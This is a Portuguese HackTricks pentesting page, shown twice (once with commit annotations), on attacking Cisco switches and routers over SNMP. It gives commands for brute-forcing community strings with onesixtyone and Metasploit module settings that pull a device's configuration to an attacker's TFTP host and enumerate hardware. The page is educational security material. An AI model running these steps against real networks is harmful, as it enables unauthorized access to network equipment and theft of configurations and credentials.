hacktricks/network-services-pentesting/pentesting-snmp/cisco-snmp.md

# Cisco SNMP

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

Esta página foi copiada de [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)

## Exfiltração de configuração e enumeração via SNMP <a href="#e21c" id="e21c"></a>

**SNMP (Simple Network Management Protocol)** é um protocolo que permite monitorar o status de dispositivos em uma rede de computadores. Pode ser equipamento de rede, telefones IP, servidores corporativos ou qualquer outra coisa.

**SNMP usa o protocolo de camada de transporte UDP com números de porta 161/UDP e 162/UDP.** As chamadas strings de comunidade são usadas para se referir a agentes SNMP para o servidor. Estas são, digamos, senhas especiais para se comunicar com o servidor SNMP. **As strings de comunidade têm permissões de apenas leitura (RO) ou leitura e gravação (RW).**

**Na verdade, SNMP não só pode monitorar o status do equipamento, mas também gerenciá-lo completamente: despejar configurações, alterar a configuração, etc.** Se um pentester pode procurar o valor das strings de comunidade, ele realmente ganha acesso ao equipamento. **No entanto, tudo depende de qual string ele bruteforceou - para a string de comunidade RO ou RW.**

**A força bruta das strings de comunidade pode ser implementada usando a** [**onesixtyone**](https://github.com/trailofbits/onesixtyone) **utilidade.** Ele receberá como entrada o dicionário para força bruta e os endereços IP dos hosts de destino. Os alvos serão:

* **10.10.100.10 - Switch Cisco vIOS**
* **10.10.100.254 - Roteador Cisco vIOS**
```
~$ onesixtyone -c communitystrings -i targets
```
Descobrimos quais são as strings de comunidade usadas nesses dispositivos. Isso abre caminho para a exploração.

### 8.1 cisco\_config\_tftp <a href="#1dbf" id="1dbf"></a>

Com o framework Metasploit, nomeadamente o módulo **cisco\_config\_tftp**, é possível obter a configuração do dispositivo, conhecendo o valor da string de comunidade. A string que tem direitos de leitura e escrita é **private**.

Será necessário o seguinte:

* **String de comunidade de leitura e escrita (COMMUNITY)**
* **Endereço IP do atacante (LHOST)**
* **Endereço IP do equipamento alvo (RHOSTS)**
* **O caminho no qual o módulo produz a configuração do dispositivo (OUTPUTDIR)**
```bash
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set COMMUNITY private
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set RHOSTS 10.10.100.10
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set LHOST 10.10.100.50
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set OUTPUTDIR /home/necreas1ng/snmp
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > exploit
```
Depois de iniciar o módulo, a configuração do host com o endereço 10.10.100.10 (10.10.100.10.txt) será baixada na pasta especificada.

![](<../../.gitbook/assets/image (223).png>)

### 8.2 snmp\_enum <a href="#3429" id="3429"></a>

Com este módulo, você pode descobrir informações sobre o hardware do alvo. Tudo é exatamente o mesmo: especifique a **COMMUNITY** (aliás, até mesmo uma string com permissões **RO** servirá) e o endereço IP do dispositivo de destino.
```bash
msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.100.10
msf6 auxiliary(scanner/snmp/snmp_enum) > exploit
```
<figure><img src="../../.gitbook/assets/image (218).png" alt=""><figcaption></figcaption></figure>

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00			`# Cisco SNMP`

			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Adquira o [swag oficial do PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Junte-se ao [💬](https://emojipedia.org/speech-balloon/) [grupo Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo telegram](https://t.me/peass) ou siga-me no Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00
			`</details>`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Esta página foi copiada de [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Exfiltração de configuração e enumeração via SNMP <a href="#e21c" id="e21c"></a>`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`SNMP (Simple Network Management Protocol) é um protocolo que permite monitorar o status de dispositivos em uma rede de computadores. Pode ser equipamento de rede, telefones IP, servidores corporativos ou qualquer outra coisa.`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`SNMP usa o protocolo de camada de transporte UDP com números de porta 161/UDP e 162/UDP. As chamadas strings de comunidade são usadas para se referir a agentes SNMP para o servidor. Estas são, digamos, senhas especiais para se comunicar com o servidor SNMP. As strings de comunidade têm permissões de apenas leitura (RO) ou leitura e gravação (RW).`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Na verdade, SNMP não só pode monitorar o status do equipamento, mas também gerenciá-lo completamente: despejar configurações, alterar a configuração, etc. Se um pentester pode procurar o valor das strings de comunidade, ele realmente ganha acesso ao equipamento. No entanto, tudo depende de qual string ele bruteforceou - para a string de comunidade RO ou RW.`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`A força bruta das strings de comunidade pode ser implementada usando a [onesixtyone](https://github.com/trailofbits/onesixtyone) utilidade. Ele receberá como entrada o dicionário para força bruta e os endereços IP dos hosts de destino. Os alvos serão:`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* 10.10.100.10 - Switch Cisco vIOS`
			`* 10.10.100.254 - Roteador Cisco vIOS`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00			```
			`~$ onesixtyone -c communitystrings -i targets`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Descobrimos quais são as strings de comunidade usadas nesses dispositivos. Isso abre caminho para a exploração.`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00
			`### 8.1 cisco\_config\_tftp <a href="#1dbf" id="1dbf"></a>`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Com o framework Metasploit, nomeadamente o módulo cisco\_config\_tftp, é possível obter a configuração do dispositivo, conhecendo o valor da string de comunidade. A string que tem direitos de leitura e escrita é private.`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Será necessário o seguinte:`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* String de comunidade de leitura e escrita (COMMUNITY)`
			`* Endereço IP do atacante (LHOST)`
			`* Endereço IP do equipamento alvo (RHOSTS)`
			`* O caminho no qual o módulo produz a configuração do dispositivo (OUTPUTDIR)`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00			```bash
			`msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set COMMUNITY private`
			`msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set RHOSTS 10.10.100.10`
			`msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set LHOST 10.10.100.50`
			`msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set OUTPUTDIR /home/necreas1ng/snmp`
			`msf6 auxiliary(scanner/snmp/cisco_config_tftp) > exploit`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Depois de iniciar o módulo, a configuração do host com o endereço 10.10.100.10 (10.10.100.10.txt) será baixada na pasta especificada.`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00
			`![](<../../.gitbook/assets/image (223).png>)`

			`### 8.2 snmp\_enum <a href="#3429" id="3429"></a>`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Com este módulo, você pode descobrir informações sobre o hardware do alvo. Tudo é exatamente o mesmo: especifique a COMMUNITY (aliás, até mesmo uma string com permissões RO servirá) e o endereço IP do dispositivo de destino.`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00			```bash
			`msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public`
			`msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.100.10`
			`msf6 auxiliary(scanner/snmp/snmp_enum) > exploit`
			```
			`<figure><img src="../../.gitbook/assets/image (218).png" alt=""><figcaption></figcaption></figure>`

			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Adquira o [swag oficial do PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Junte-se ao [💬](https://emojipedia.org/speech-balloon/) [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-me no Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00
			`</details>`